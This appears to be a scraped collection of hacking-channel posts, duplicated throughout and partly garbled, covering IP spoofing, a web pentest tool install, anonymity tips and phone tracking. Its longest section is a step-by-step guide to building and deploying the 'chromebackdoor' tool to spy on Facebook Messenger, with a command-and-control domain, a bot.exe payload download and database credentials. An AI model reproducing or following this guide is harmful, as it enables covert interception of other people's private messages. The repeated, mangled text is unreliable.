> Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contains the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses โ specifically the โsource addressโ field.
๐ฆTransmission Control Protocol (TCP) :
It is the connection-oriented, reliable transport protocol in the TCP/IP suite. Connection-oriented simply means that the two hosts participating in a discussion must first establish a connection via the 3-way handshake (SYN-SYN/ACK-ACK). Reliability is provided by data sequencing and acknowledgement. TCP assigns sequence numbers to every segment and acknowledges any and all data segments recieved from the other end.
> As you can see above, the first 12 bytes of the TCP packet, which contain port and sequencing information.
> TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of the *first* byte of data in the TCP segment. The acknowledgement number field in the TCP header holds the value of next *expected* sequence number, and also acknowledges *all* data up through this ACK number minus one.
> TCP packets can be manipulated using several packet crafting softwares available on the internet.
๐ฆThe Attack
IP-spoofing consists of several steps. First, the target host is choosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.
> Spoofing can be implemented by different ways as given below -
๐ฆNon-Blind Spoofing :- This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately.
๐ฆBlind Spoofing :- Here the sequence and acknowledgement numbers are unreachable. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers.
๐ฆUsage :
IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against โ Denial of Service attacks, or DoS.
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆIP Spoofing FULL :
The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.
T.me/UnderCodeTestingOfficial
๐ฆWhy it works ?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is security weakness in the TCP protocol known as sequence number prediction.
๐ฆHow it works ?
To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.
๐ฆInternet Protocol (IP) :
It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.
> Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contains the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses โ specifically the โsource addressโ field.
๐ฆTransmission Control Protocol (TCP) :
It is the connection-oriented, reliable transport protocol in the TCP/IP suite. Connection-oriented simply means that the two hosts participating in a discussion must first establish a connection via the 3-way handshake (SYN-SYN/ACK-ACK). Reliability is provided by data sequencing and acknowledgement. TCP assigns sequence numbers to every segment and acknowledges any and all data segments recieved from the other end.
> As you can see above, the first 12 bytes of the TCP packet, which contain port and sequencing information.
> TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of the *first* byte of data in the TCP segment. The acknowledgement number field in the TCP header holds the value of next *expected* sequence number, and also acknowledges *all* data up through this ACK number minus one.
> TCP packets can be manipulated using several packet crafting softwares available on the internet.
๐ฆThe Attack
IP-spoofing consists of several steps. First, the target host is choosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.
> Spoofing can be implemented by different ways as given below -
๐ฆNon-Blind Spoofing :- This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately.
๐ฆBlind Spoofing :- Here the sequence and acknowledgement numbers are unreachable. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers.
๐ฆUsage :
IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against โ Denial of Service attacks, or DoS.
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆITWSV- Integrated Tool for Web Security Vulnerability.
ITWSV is automated penetration testing tool which performs information gathering, auditing and reporting.
Instagram.com/UndercodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/penetrate2hack/ITWSV.git
2) cd ITWSV
3) chmod +x start.sh
4) chmod +x update.sh (only if required)
5) ./start.sh
๐ฆFEATURES :
โข WHOIS
โข DNSWALK
โข FIERCE
โข DNSRecon
โข DNSenum
โข NMAP
โข DMitry
โข theHarvester
โข LBD
โข SSLScan
โข SSLYze
โข WhatWeb
โข Automater
โข Grabber
โข Parsero
โข Uniscan
โข Metagoofil
โข A2SV
โข WPScan
โข Droopescan
โข WPSeku
โข XssPy
โข Spaghetti
โข sublist3r
โข WAFW00F
โข nslookup
โข nslookup
โข dirsearch
โข OWASP Joomscan
โข Spaghetti
โข Globuster
โข Grabber
๐ฆTESTED ON :
> PARROT
> DEBIAN
> KALI
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆITWSV- Integrated Tool for Web Security Vulnerability.
ITWSV is automated penetration testing tool which performs information gathering, auditing and reporting.
Instagram.com/UndercodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/penetrate2hack/ITWSV.git
2) cd ITWSV
3) chmod +x start.sh
4) chmod +x update.sh (only if required)
5) ./start.sh
๐ฆFEATURES :
โข WHOIS
โข DNSWALK
โข FIERCE
โข DNSRecon
โข DNSenum
โข NMAP
โข DMitry
โข theHarvester
โข LBD
โข SSLScan
โข SSLYze
โข WhatWeb
โข Automater
โข Grabber
โข Parsero
โข Uniscan
โข Metagoofil
โข A2SV
โข WPScan
โข Droopescan
โข WPSeku
โข XssPy
โข Spaghetti
โข sublist3r
โข WAFW00F
โข nslookup
โข nslookup
โข dirsearch
โข OWASP Joomscan
โข Spaghetti
โข Globuster
โข Grabber
๐ฆTESTED ON :
> PARROT
> DEBIAN
> KALI
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to be completely anonymous online by undercOde:
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) use a fake mac adress for your wlan card
2) use your linux or windows in vm machine
3) use unonsurf tool (vpn+tor server and much more)
>git clone https://github.com/Und3rf10w/kali-anonsurf
> cd kali-anonsurf
> ./installer.sh
4) use proxies
5) make sure you have lastest updates installed on your system
6) never maximize any browser
7) Never think you can be anonymous on rooted- or non rooted phone๐
! well done
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to be completely anonymous online by undercOde:
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) use a fake mac adress for your wlan card
2) use your linux or windows in vm machine
3) use unonsurf tool (vpn+tor server and much more)
>git clone https://github.com/Und3rf10w/kali-anonsurf
> cd kali-anonsurf
> ./installer.sh
4) use proxies
5) make sure you have lastest updates installed on your system
6) never maximize any browser
7) Never think you can be anonymous on rooted- or non rooted phone๐
! well done
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
------๐๐D๐๐๐ฎ๐D๐-----
๐ฆHACK FACEBOOK MESSANGER USING CHROME BACKDOOR ?
(t.me/UndercodeTestingOfficial)
โ ๏ธFULL GUIDEโ ๏ธ
๐ฆINSTALLISATION :
So first we need to git clone the tool.
[bash]
1)git clone https://github.com/graniet/chromebackdoor.git[/bash]
2)We can then cd into that directory, and we need to install some dependencies.
[bash]
3)apt-get install -y python-pip[/bash]
4)As we are using ubuntu we need to install python-m2crytpto
[bash]apt-get install python-m2crypto[/bash]
5)Now we can install crxmake
[bash]pip install crxmake[/bash]
6)Before we run the program it will require us to enable https, we can do this by using a built-in package within the LAMP ubuntu server, letsencrypt
[bash]letsencrypt โapache[/bash]
7)We then need to follow the steps within the setup. First by entering in a domain name โc2.iminyour.networkโ. Followed by an email address โdale@demmsec.co.ukโ. Then we need to accept the terms of service, and we only allow it to be accessed over https.
8)We can now run chromebackdoor
[bash]python chromebackdoor.py[/bash]
9)This runs the program however in order to create the backdoor we need to use an argument, for this we are going to use the โchrome argument
[bash]python chromebackdoor.py โchrome[/bash]
10)So these next steps are kinda confusing, and the English in the program isnโt well written, which doesnโt help. So we need to add where the website will be hosted, in this case, we use the full URL of โhttps://c2.iminyour.network/chromebackdoorโ then we add what we think is meant to be relay, so we enter โrelaisโ and confirm the information is correct. We are then presented with a list menu which for this video we use the Facebook Messenger Spy, so we enter โ4โ and this has now created a zip folder. We can now unzip the folder
[bash]unzip 22029.zip[/bash]
11)From the files that have been extracted, we then need to change the config.php file located in the /web/includes directory using your preferred text editor. We then change the first line of the .php file to.
(Instagram.com/UndercodeTestingCompany)
12)sbdd = PDO('mysql:host=localhost ; dbname=chromebackdoor', 'root','toor');
13)If you are using DigitalOcean the password file is located in
[bash]~/.digitalocean_password[/bash]
14)We can copy this and add it to our config file so we go back to the file and amend the first line and enter our DigitalOcean password
15)sbdd = PDO('mysql:host=localhost ; dbname=chromebackdoor', 'root','newpassword');
16)We then need to install phpmyadmin and auto config apache 2
[bash] apt-get install phpmyadmin[/bash]
17)We are going to use the copied password from DigitalOcean for the phpmyadmin. Once the configuration has finished we can then access the phpmyadmin web portal to add chromebackdoor to the database.
18)We need to locate the chromebackdoor.sql file we can easily find this with mobaXterm with the side panel. We then create a new folder on are host machine and copy the chromebackdoor.sql into our new folder. We then need to go back to phpmyadmin and import that file. Once that has been imported and saved we can then go to that web directory which will navigate us to the chromebackdooor web portal. We can use the credentials that are in the chromebackdoor.sql which is โrootโ and โtoorโ as you can see there will be nothing in the web portal.
19)If we go back to our terminal we need to add i368 architecture to enable us to use wine.
[bash]dpkg โadd-architecture i386[/bash]
20)Then we need to install wine
[bash] apt-get install wine[/bash]
21)This will throw errors at us, however, we can run the command to fix this issue
[bash] dpkg โconfigure -a[/bash]
(join t.me/UndercodeTestingOfficial)
22)Now this is done we can use the build argument for the chromebackdoor
[bash]python chormebackdoor.py โbuild[/bash]
๐ฆHACK FACEBOOK MESSANGER USING CHROME BACKDOOR ?
(t.me/UndercodeTestingOfficial)
โ ๏ธFULL GUIDEโ ๏ธ
๐ฆINSTALLISATION :
So first we need to git clone the tool.
[bash]
1)git clone https://github.com/graniet/chromebackdoor.git[/bash]
2)We can then cd into that directory, and we need to install some dependencies.
[bash]
3)apt-get install -y python-pip[/bash]
4)As we are using ubuntu we need to install python-m2crytpto
[bash]apt-get install python-m2crypto[/bash]
5)Now we can install crxmake
[bash]pip install crxmake[/bash]
6)Before we run the program it will require us to enable https, we can do this by using a built-in package within the LAMP ubuntu server, letsencrypt
[bash]letsencrypt โapache[/bash]
7)We then need to follow the steps within the setup. First by entering in a domain name โc2.iminyour.networkโ. Followed by an email address โdale@demmsec.co.ukโ. Then we need to accept the terms of service, and we only allow it to be accessed over https.
8)We can now run chromebackdoor
[bash]python chromebackdoor.py[/bash]
9)This runs the program however in order to create the backdoor we need to use an argument, for this we are going to use the โchrome argument
[bash]python chromebackdoor.py โchrome[/bash]
10)So these next steps are kinda confusing, and the English in the program isnโt well written, which doesnโt help. So we need to add where the website will be hosted, in this case, we use the full URL of โhttps://c2.iminyour.network/chromebackdoorโ then we add what we think is meant to be relay, so we enter โrelaisโ and confirm the information is correct. We are then presented with a list menu which for this video we use the Facebook Messenger Spy, so we enter โ4โ and this has now created a zip folder. We can now unzip the folder
[bash]unzip 22029.zip[/bash]
11)From the files that have been extracted, we then need to change the config.php file located in the /web/includes directory using your preferred text editor. We then change the first line of the .php file to.
(Instagram.com/UndercodeTestingCompany)
12)sbdd = PDO('mysql:host=localhost ; dbname=chromebackdoor', 'root','toor');
13)If you are using DigitalOcean the password file is located in
[bash]~/.digitalocean_password[/bash]
14)We can copy this and add it to our config file so we go back to the file and amend the first line and enter our DigitalOcean password
15)sbdd = PDO('mysql:host=localhost ; dbname=chromebackdoor', 'root','newpassword');
16)We then need to install phpmyadmin and auto config apache 2
[bash] apt-get install phpmyadmin[/bash]
17)We are going to use the copied password from DigitalOcean for the phpmyadmin. Once the configuration has finished we can then access the phpmyadmin web portal to add chromebackdoor to the database.
18)We need to locate the chromebackdoor.sql file we can easily find this with mobaXterm with the side panel. We then create a new folder on are host machine and copy the chromebackdoor.sql into our new folder. We then need to go back to phpmyadmin and import that file. Once that has been imported and saved we can then go to that web directory which will navigate us to the chromebackdooor web portal. We can use the credentials that are in the chromebackdoor.sql which is โrootโ and โtoorโ as you can see there will be nothing in the web portal.
19)If we go back to our terminal we need to add i368 architecture to enable us to use wine.
[bash]dpkg โadd-architecture i386[/bash]
20)Then we need to install wine
[bash] apt-get install wine[/bash]
21)This will throw errors at us, however, we can run the command to fix this issue
[bash] dpkg โconfigure -a[/bash]
(join t.me/UndercodeTestingOfficial)
22)Now this is done we can use the build argument for the chromebackdoor
[bash]python chormebackdoor.py โbuild[/bash]
23)We are then asked the backdoor type, in this case, it is โโchromeโ we then need to enter the location of the file โ/var/www/html/chromebook/backdoor.crxโ this will start the install and will throw loads of errors at us, but its nothing to worry about. We are then given the option to use a Rubber Ducky Payload for this we choose โnโ
24)We can then navigate to our payload โhttps://c2.iminyour.network/chromebackdoor/bot.exeโ this will download the file and if you have anti-virus installed, it should alert you, well it did with avast anyway ๐
25)We can then run the program which will kill chrome but this will add the extension to chrome. If we go back to the web portal we will be able to see a bot. This should now, in theory, log any facebook messages that are sent or received while the payload is running, although this is not the case. We do a bit of troubleshooting and realize that we need to install curl [bash]apt-get install -y php-curl[/bash]
26)We then need to amend the apache php.ini file located in /etc/php/7.0/apache2/ then search for โcurlโ by using ctrl + w within nano and remove the โ;โ from the line
27)extension=php_curl.dll
after this restart apache [bash] service apache2 restart[/bash] and now we can retest by sending another message and we should be able to see messages being saved within the web portal.
๐ฆi dont said we should but we donโt, so we need to go back to our terminal and copy our .js files to the chromebackdoor directory [bash] cp *.js ../[/bash]
We then finally need to amend the facebookmessage.js file that we have just moved. Locate the line that has โhttpโ in it and change it to โhttpsโ and then a few lines down change the line that has โhttp://localhost:8888โฆโ to our domain. โhttps://iminyour.network /chromebackdoor/โฆ.โ
And now!! Finally!! it is working!! We should now be able to see messages being recorded!
ENJOY :)
WRITTEN BY Airlin
-----๐๐D๐๐๐ฎ๐D๐-----
24)We can then navigate to our payload โhttps://c2.iminyour.network/chromebackdoor/bot.exeโ this will download the file and if you have anti-virus installed, it should alert you, well it did with avast anyway ๐
25)We can then run the program which will kill chrome but this will add the extension to chrome. If we go back to the web portal we will be able to see a bot. This should now, in theory, log any facebook messages that are sent or received while the payload is running, although this is not the case. We do a bit of troubleshooting and realize that we need to install curl [bash]apt-get install -y php-curl[/bash]
26)We then need to amend the apache php.ini file located in /etc/php/7.0/apache2/ then search for โcurlโ by using ctrl + w within nano and remove the โ;โ from the line
27)extension=php_curl.dll
after this restart apache [bash] service apache2 restart[/bash] and now we can retest by sending another message and we should be able to see messages being saved within the web portal.
๐ฆi dont said we should but we donโt, so we need to go back to our terminal and copy our .js files to the chromebackdoor directory [bash] cp *.js ../[/bash]
We then finally need to amend the facebookmessage.js file that we have just moved. Locate the line that has โhttpโ in it and change it to โhttpsโ and then a few lines down change the line that has โhttp://localhost:8888โฆโ to our domain. โhttps://iminyour.network /chromebackdoor/โฆ.โ
And now!! Finally!! it is working!! We should now be able to see messages being recorded!
ENJOY :)
WRITTEN BY Airlin
-----๐๐D๐๐๐ฎ๐D๐-----
โโโUnder๐ฎ๐d๐-โโ-
๐ฆSTEP BY STEP HOW POLICE TRACK
locate a lost CELL
t.me/UndercodeTestingOfficial)
๐ฆStep 1 โ it can be tracked by โ IMEI Number as well as by mobile phone number , if you donโt remember the IMEI number of your mobile phone , Then your IMEI number can be easily obtained by the telecom operator company whose sim card is being used in that cell phone. Once you tell your mobile number to your telecom operator , They will tell you the IMEI Number of the cell phone in which that sim card was being used. Because whenever you insert a sim card in any cell phone and switch ON , Then it connect to the network, and your telecom operator automatically register the IMEI number of the device on network.
Step 2 โ This is sure , if your phone has been stolen , The person who had stolen will defiantly switch off your cell phone , remove & either break or throughout your sim card as well as, if he is enough intelligent he will format / wipe data / factory restore that cell phone. So that any tracking software installed in the cell phone get removed
from the phone.
Open In App Sign In
Step 3 โ Now he will insert his own or another Sim card in that cell phone and switch ON your cell phone . Once it connect to the network of any telecom operator , Again the IMEI Number of your cell phone will be registered on the network with different mobile number.
Step 4 โ Now police department makes an enquiry from Telecom regulatory authority of your country about your Mobile IMEI Number. They will provide them the detail of that telecom operator name with the mobile number of sim card currently being used in your cell phone.
Step 5 โ Now police department will contact the telecom operator of that mobile number whose sim card is being currently used in your mobile phone. The telecom operator will provide the details of all those Base tower stations (Mobile towers) , who are currently providing network to your mobile phone. Every BTS has different ID , to identify the area location .
Step 6 โ Now let me tell you that โ whenever your cell phone is Switched ON and accessing the network . at a time your cell phone is connected with more than one Mobile towers(BTS) located in that area. But the communication is made from only that tower which is nearest to the mobile phone location.
Step 7 โ Now the theory of triangulation is applied to find exact location of your cell phone . In this method a virtual triangle of signals (radio waves) is created between the mobile phone and 3 towers who are providing network to the cell phone. Now the angle at which your cell phone exists is calculated by a mathematical formula . In this way police trace & locate any cell phone location.
๐ฆFor Android Mobile phone :
Android Device Manager ( NO GPS Required)โ This is an ultimate phone tracing software which is launched itself by Google for protection of android devices. It works even if the sim card of your cell phone is changed. This software is inbuilt in every android cell phone , but you need to manually activate this software . In order to activate this application , Go to > settings > security >Device administrator > Android device manager. Here you need to activate this software , once you activate this software , you will be able to Trace the location of your phone any time on internet by logging in to this url โ
https://www.google.com/ android / device manager once you go to this url , enter your Google play store user name and password . you will be able to see the current location of your cell phone. Remember this technology of tracing cell phone does not require GPS.You can remotely , wipe data on your phone , lock & change phone password , make a loud ring etc . which may help in finding your phone. The only weaker point of this application is that , if you hard reset your phone / factory restore that phone , this application will not work.
@ mr botnet
-------๐๐D๐๐๐ฎ๐D๐------
๐ฆSTEP BY STEP HOW POLICE TRACK
locate a lost CELL
t.me/UndercodeTestingOfficial)
๐ฆStep 1 โ it can be tracked by โ IMEI Number as well as by mobile phone number , if you donโt remember the IMEI number of your mobile phone , Then your IMEI number can be easily obtained by the telecom operator company whose sim card is being used in that cell phone. Once you tell your mobile number to your telecom operator , They will tell you the IMEI Number of the cell phone in which that sim card was being used. Because whenever you insert a sim card in any cell phone and switch ON , Then it connect to the network, and your telecom operator automatically register the IMEI number of the device on network.
Step 2 โ This is sure , if your phone has been stolen , The person who had stolen will defiantly switch off your cell phone , remove & either break or throughout your sim card as well as, if he is enough intelligent he will format / wipe data / factory restore that cell phone. So that any tracking software installed in the cell phone get removed
from the phone.
Open In App Sign In
Step 3 โ Now he will insert his own or another Sim card in that cell phone and switch ON your cell phone . Once it connect to the network of any telecom operator , Again the IMEI Number of your cell phone will be registered on the network with different mobile number.
Step 4 โ Now police department makes an enquiry from Telecom regulatory authority of your country about your Mobile IMEI Number. They will provide them the detail of that telecom operator name with the mobile number of sim card currently being used in your cell phone.
Step 5 โ Now police department will contact the telecom operator of that mobile number whose sim card is being currently used in your mobile phone. The telecom operator will provide the details of all those Base tower stations (Mobile towers) , who are currently providing network to your mobile phone. Every BTS has different ID , to identify the area location .
Step 6 โ Now let me tell you that โ whenever your cell phone is Switched ON and accessing the network . at a time your cell phone is connected with more than one Mobile towers(BTS) located in that area. But the communication is made from only that tower which is nearest to the mobile phone location.
Step 7 โ Now the theory of triangulation is applied to find exact location of your cell phone . In this method a virtual triangle of signals (radio waves) is created between the mobile phone and 3 towers who are providing network to the cell phone. Now the angle at which your cell phone exists is calculated by a mathematical formula . In this way police trace & locate any cell phone location.
๐ฆFor Android Mobile phone :
Android Device Manager ( NO GPS Required)โ This is an ultimate phone tracing software which is launched itself by Google for protection of android devices. It works even if the sim card of your cell phone is changed. This software is inbuilt in every android cell phone , but you need to manually activate this software . In order to activate this application , Go to > settings > security >Device administrator > Android device manager. Here you need to activate this software , once you activate this software , you will be able to Trace the location of your phone any time on internet by logging in to this url โ
https://www.google.com/ android / device manager once you go to this url , enter your Google play store user name and password . you will be able to see the current location of your cell phone. Remember this technology of tracing cell phone does not require GPS.You can remotely , wipe data on your phone , lock & change phone password , make a loud ring etc . which may help in finding your phone. The only weaker point of this application is that , if you hard reset your phone / factory restore that phone , this application will not work.
@ mr botnet
-------๐๐D๐๐๐ฎ๐D๐------